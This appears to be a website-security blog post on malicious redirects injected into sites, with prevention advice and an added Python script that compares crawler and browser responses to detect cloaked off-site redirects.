Understanding & Stopping Malicious Redirects

Many website owners don’t know they’re infected with malicious redirects until they start getting calls from wary customers. Instead of the site they were expecting, it loaded some pretty shady content from the nether reaches of the internet.

Malicious redirects are caused by hackers injecting scripts into infected sites that send visitors to destinations where they usually get scammed or infected with malware.

Not to be confused with SEO spam, malicious redirects take away — or redirect — visitors from their intended websites. These hacks can be triggered by clicking on a search result or during a visit to the website itself.

Examples of malicious redirects

Scripts that execute malicious redirects can lurk anywhere on a website. We’ve seen them stored in databases, where the script distinguished real visitors from search engine spiders and sent only the visitors to a malware download.

The malicious redirect was triggered from a search engine results page, not within the infected website. One click, and wham — malware starts downloading.

It’s also very common to find malicious redirects infecting third-party scripts for components like themes and plugins. In one instance, the infected component was a fix for the much-beloved Tweet counter on WordPress websites.

In another, a third-party component deliberately redirected mobile visitors to the legit download pages of unwanted apps — an effort to score extra money.

Given the potential consequences of malicious redirects, it’s crucial to carefully evaluate third-party components before installing them and implement the measures we’ll discuss later.

The impacts of malicious redirects

Like any hack, malicious redirects will gain the attention of search engines. An infected site will eventually get blacklisted, which cuts off nearly all traffic from organic searches. Even with the malicious scripts removed, it’s a difficult and often expensive process to convince search engines to unflag a site, allowing its rank to slowly be restored.

And let’s not ignore the immediate impact. What’s going to happen when a visitor goes to a website to buy shoes, but instead gets swept into a scam? Chances are, that’ll be their last visit.

The combined effect of blacklisting and damaged reputation can easily overwhelm a business. Imagine trying to find the source of an infection while dealing with furious customers and lost revenue, and then facing search engine blacklists and the cost of fixing the hack.

How to stop malicious redirects

Fortunately, malicious redirects can be stopped. It requires controlling who has access to your site, staying familiar with all its components, and maintaining awareness of your site’s health. Here’s how that breaks down:

  • Access — Make sure people have only the least amount of access necessary to let them work on your site. Remove any unused accounts. This reduces the number of entry points available to a hacker. Also consider putting your website behind a firewall, which blocks malicious traffic before it reaches your site.
  • Components — Don’t install third-party components (e.g. plugins and themes) without checking out their developer, or install only from the official CMS repositories. Make sure you know how often they’re updated and who’s handling those updates. And periodically audit your third-party components to see if any are unused or outdated and need to be removed.
  • Awareness — Make sure there’s a way to regularly scan your website for signs of infection or vulnerability. This can be as simple as using one of the many free remote scanners, like SiteCheck or UnmaskParasites. You should also have an application for server-side scans, which look deeper into a site’s files and databases.
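A small differential probe in the spirit of the remote scanners mentioned above, added here as an example and not part of the original post: it requests one URL as a crawler, as a plain browser, and as a browser arriving from a search results page, then flags any profile that is redirected off-site while the crawler profile is served normally, which is the cloaking behaviour described in the examples section. The header values and the same-host comparison rule are assumptions.

```python
import urllib.error
import urllib.request
from urllib.parse import urlsplit

# Visitor profiles to compare (assumed, illustrative header values).
PROFILES = {
    "crawler": {"User-Agent": "Mozilla/5.0 (compatible; Googlebot/2.1)"},
    "browser": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0) Firefox/120.0"},
    "from_search": {"User-Agent": "Mozilla/5.0 (Windows NT 10.0) Firefox/120.0",
                    "Referer": "https://www.google.com/search?q=example"},
}

class NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so the first Location header stays visible."""
    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None

def probe(url, headers, timeout=10):
    """Fetch url once with the given headers; return (status, Location or None)."""
    opener = urllib.request.build_opener(NoRedirect)
    req = urllib.request.Request(url, headers=headers)
    try:
        with opener.open(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Location")
    except urllib.error.HTTPError as err:  # an unfollowed 3xx surfaces here
        return err.code, err.headers.get("Location")

def off_site(url, location):
    """True when a Location header points at a different host than url."""
    if not location:
        return False
    target = urlsplit(location).netloc
    return bool(target) and target != urlsplit(url).netloc

def cloaked_redirects(url, results):
    """results maps profile name -> (status, location). Return the profiles
    sent off-site while the crawler profile was not redirected off-site."""
    if off_site(url, results["crawler"][1]):
        return []  # crawlers see the redirect too, so it is not cloaked
    return sorted(name for name, (status, loc) in results.items()
                  if name != "crawler" and 300 <= status < 400 and off_site(url, loc))

def scan(url):
    return cloaked_redirects(url, {n: probe(url, h) for n, h in PROFILES.items()})

if __name__ == "__main__":
    import sys
    print("conditional redirect for:", scan(sys.argv[1]) or "none")
```

Run it against your own site’s front page and a few deep pages; a result other than "none" means the server answers differently depending on who appears to be asking, which is worth a server-side scan of the files and database.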

These measures are by no means everything necessary to maintain website security, but rather the minimum required to protect yourself against injections. It’s far better to develop a complete plan for website security that addresses all types of threats.

How to remove malicious redirects

If you’re already hacked, it’s critical to get help now. We’ve already discussed the consequences, so take immediate steps toward recovery. If you’re technically savvy, it’s likely you can clean the hack by yourself — and we offer many free resources to help you get this done.
